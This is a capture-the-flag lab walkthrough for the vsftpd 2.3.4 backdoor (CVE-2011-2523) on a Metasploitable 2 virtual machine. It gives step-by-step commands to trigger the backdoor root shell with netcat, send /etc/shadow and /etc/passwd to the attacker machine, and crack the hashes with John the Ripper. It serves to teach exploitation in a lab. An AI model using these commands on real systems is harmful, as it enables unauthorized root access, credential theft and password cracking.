# Scenario Capture the Flag - CVE-2011-2523
Capture the decrypted `/etc/shadow` and `/etc/passwd` file from vulnerable Metasploitable 2 server.
# Setup Enviornment
## Step 1: Download an unzip virtual machine
For this CTF, we run VMware Workstation Pro with two virtual machines. We utilize Kali Linux as the attacker's machine and Metasploitable 2 as the vulnerable machine.
- Download and Install VMware Workstation: https://www.vmware.com/products/workstation-player/workstation-player-evaluation.html
- Download and Extract Kali Linux Virtual Machine: https://www.kali.org/get-kali/
- Download and Extract Metasploitable 2 Virtual Machine: https://sourceforge.net/projects/metasploitable/files/Metasploitable2/
## Step 2: Open Kali Linux and Metasploitable 2 Virtual Machines in VMware from extracted file
- Choose `Open a Virtual Machine` Option in VMware Workstation and select unzipped Kali Linux file
- Right click on slide bar and select `open` option, then select unzipped Metasploitable 2 file
- Press `Play virtual machine` button on both virtual machines
- When prompted to select `I moved It` or `I copied It` option, select `I copied It` option
## Step 3: Login
- Login to Kali Linux using `kali` as the username and password
- Login to Metasploitable using `msfadmin` as the username and password
## Step 4: Record IP address of Metasploitable virtual machine
- Run `ip addr show` and record IP address of the `inet` section
# Solution
Massachusetts Institute of Technology Research and Engineering detail CVE-2011-2523 as a common vulnerability and exposure where ```vsftpd 2.3.4 downloaded between 20110630 and 20110703 contains a backdoor which opens a shell on port 6200/tcp```.
## Step 1: Search for open ports on Metasploitable machine using FTP service
- `nmap <vulnerable-machine-ip-address>`
- nmap scan should show an open port on port 21 using the ftp service
## Step 2: Attempt to NetCat into open port
- `nc <vulnerable-machine-ip-address> 21`
- Username is any string with `:)` on the end, enter `user <string>:)`
- When prompted for a password enter any string `pass <string>`
- Then exit connection using ^C [CTRL + C], a shell at root to Metasploitable has been opened on port 6200.
## Step 3: Connect to shell on port 6200 of the vulnerable machine
- ` nc -v <vulnerable-machine-ip-address> 6200`
- Show ip address of current connection `ip addr show`
- Show that root access was granted using `whoami`
## Step 4: Copy `/etc/shadow` and `/etc/passwd` file into another file
- `cp /etc/shadow shadow.txt`
- `cp /etc/passwd passwd.txt`
## Step 5: Send copied files to Kali Linux machine using NetCat
- On attacker machine, lookup the ip address under `inet` using command `ip addr show`
- Listen for files using `nc -l -p 1234 > shadow.txt` on attacker machine
- In root shell on Metasploitable `nc -w 3 <destination-ip> 1234 < shadow.txt`
- Repeat for passwd file
## Step 5: Format shadow file into `John` tool format
- `unshadow passwd.txt shadow.txt > unshadowed-input`
- Observe the file using `cat unshadowed-input`, should have username and password stored
## Step 6: Decrypt shadow file using `John` command and wordlist
- Utilize the wordlist `rockyou.txt` to crack hashes using john
- Unzip wordlist file on Kali Linux using `sudo gzip -d /usr/share/wordlists/rockyou.txt.gz`
- When promoted for a password, use the default admin password for Kali Linux `kali`
- Unhash passwords using `john unshadowed-input –wordlist=/usr/share/wordlists/rockyou.txt`
- View cracked passwords `john –show unshadowed-input`
[4.0K] /data/pocs/71f014fdbea60e57b657f829c3bb49584e63d680
└── [3.5K] README.md
0 directories, 1 file